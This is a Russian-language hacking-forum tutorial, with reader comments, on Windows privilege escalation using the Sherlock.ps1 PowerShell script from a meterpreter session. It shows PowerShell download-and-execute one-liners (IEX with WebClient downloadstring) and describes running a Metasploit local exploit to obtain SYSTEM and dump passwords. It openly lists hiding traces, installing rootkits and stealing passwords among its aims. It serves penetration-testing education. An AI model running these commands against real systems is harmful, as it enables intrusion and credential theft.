• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья PowerShell для хакера ( часть X ) Повышения привилегий . [скрипт Sherlock.ps1]

maxresdefault.jpg


Приведствую Вас коллеги))
Продолжаем развивать нашу тему и сегодня мы с вами друзья остановимся на очередном этапе тестирования на проникновения , который принято в народе называть "Повышение привилегий" [Privilege Escalation (PrivEsc)] И делать мы это будем опять же таки средствами PowerShell. Так же сегодня я вас познакомлю , по моему мнению , с замечательным инструментом Sherlock.

Для чего нужно ?
  • Для полного контроля системы.
  • Для более стойкого закрепления в системе.
  • Для сокрытие следов преступления,прибывания в системе.
  • Для установки руткитов.
  • Для получения конфиденциальной информации , которая обычному пользователю не доступна.
  • Для извлечения паролей и многое другое...
Ну что ж , думаю более мение понятно для чего это делаеться) Теперь кратенько об нашем инструменте:
Sherlock - это скрипт на PowerShell , который проверяет систему на отсудствие важных обновлений и патчей системы , исходя из чего выдает нам список самых распрастранненых , по мнению автора скрипта , LPE (Local Privilege Escalation) эксплоитов с ссылками на их описание. То есть думаю понятно? Да? Если важного обновления в системе нет - то система потенциально уязвима к тому или иному CVE, все как бы логично просто )

Ну что ж давайте перейдем к тестированию.
Тестировать я буду сразу на двух системах, это :
  • Windows 7 x32
  • Windows 10 x32
Условно представим что мы попали в систему и имеем сессию обычного рядового пользователя:
На Windows 7:
2.PNG


И на Windows 10:

3.PNG


Условно эти две машины скомпрометированы нами:

4.PNG


Подгрузим модуль powershell через метерпретер ( у метерпертора есть расширение которое позволяет импортировать модули , выполнять команды PowerShell и так же запускать интерактивный PowerShell)
Так вот на win10 он у меня подгрузился без проблем:
5.PNG

После чего в справке метерпретора стали доступны нужные нам команды:

6.PNG


Но на win7 у меня он не смог подгрузиться (попытаюсь выяснить причину ошибки , если найду - отпишу в комментариях):

7.PNG


Тем не мение это не мешает мне проверить работу скрипта Sherlock. Ну что ж давайте начнем с Win10:
Можно было конечно подгрузить локално , но я по старому доброму способу "методом дроп"
PS > IEX (New-Object Net.WebClient).downloadstring('
9.PNG


Увы шерлок мне не выдал не одного уязвимого CVE на системе с Win10 ((
Видать установленны все важные обновления.
10.PNG


Теперь давайте проверим на машине с Win7:
Так как модуль PowerShell у меня не подгрузился я выполнил нужную команду для скрипта через обычный Windows Shell:
11.PNG
>>> powershell -nop -c IEX (New-Object Net.WebClient).downloadstring('
Результат меня приятно удивил)

12.PNG


Система уязвима к множеству различных LPE )

Что ж давайте поищим какой то LPE из списка в метаслоите:

Запустив сплоит видим что был создан привилегированый процес:
13.PNG

Мигрируем в него и получаем привилегии системы))))


14.PNG


В результате успешного повышения можем получить список всех паролей от этой системы:
15.PNG


Для сравнения попытаемся этот же сплойт выполнить на машине с Win10 - и получаем ошибку при попытке миграции в процес.

16.PNG


[ИТОГИ]

Вообщем как видим скрипт делает свою работу , но если на машине со всеми важными обновлениями и патчами с его помощью повысит привилегии врят ли получиться.

Но так же хочу заметить что последнее обновлении скрипта (комит на гитхабе ) был сделан 29.09.2017 ( на 19 дней раньше от написание статьи) - это говорит о том что проект живой , и в случае выхода публичных LPE , автор будет их добавлять в работу своего скрипта.
Так что этот инструмент имеет место быть в наборе пентестера)))
Снимок.PNG


Видосик будет позже.)
Всем спасибо)
 
Последнее редактирование:

wooolff

Green Team
19.02.2017
233
36
BIT
0
Пробую вин7, ничего не получается ни модуль шелла не загружается, ни выполнить шуловскую команду ни какую не могу. В чем может быть проблема?
 
O

OneDollar

Все загружается, я проверял недавно)
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
7
Пробую вин7, ничего не получается ни модуль шелла не загружается, ни выполнить шуловскую команду ни какую не могу. В чем может быть проблема?

Мешаете всё в кучу ) Что именно не загружается ? Powershell или сам скрипт ? Доступ в интернет есть ? Команду в консоли правильно пишите ? Что пишет при выполнении ? Больше вводных )
 

wooolff

Green Team
19.02.2017
233
36
BIT
0
у меня пишет
oad powershell


Loading extension powershell...

[-] Failed to load extension: No module of the name ext_server_powershell.x86.dll found
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!